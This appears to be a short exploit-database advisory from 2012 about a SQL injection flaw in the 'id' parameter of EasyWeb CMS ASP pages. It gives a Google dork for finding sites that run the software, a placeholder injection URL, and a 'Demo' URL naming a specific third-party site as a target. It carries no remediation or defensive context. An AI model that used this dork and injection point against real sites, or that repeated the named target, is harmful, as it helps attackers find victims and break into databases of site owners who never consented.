EasyWeb suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
583bba054580237d31d824cdefc9a3a038c3b0a9de638f33a80e3f50f881ce9f
# Exploit Title: easyweb SQLi Vulnerability
# Date: 09/03/2012
# Author: Persia Security Group - (Prince & mafia1990)
# Vendor Homepage: http://www.easy-web.it/
# Version: All Version
# Google Dork: intext:"powered by easyweb" site:it
# Tested on: win 2003 & 2008 server , Vista , 7 & IIS 6.0, 7.0, 7.5
==========================================================================================
Vulnerability Details
==========================================================================================
/*********/
intext:"powered by easyweb" site:it
/*********/
========================================Exploit============================================
The SQLi vulnerability in param[?id=] &&==> .!..
Code: asp, aspx, MSAccess
Example:
http://localhost/anyanyany.asp?id=XX[SQLi]
Demo:
http://www.cococool.it/dettagli.asp?id=1666[SQLi Here]
==========================================================================================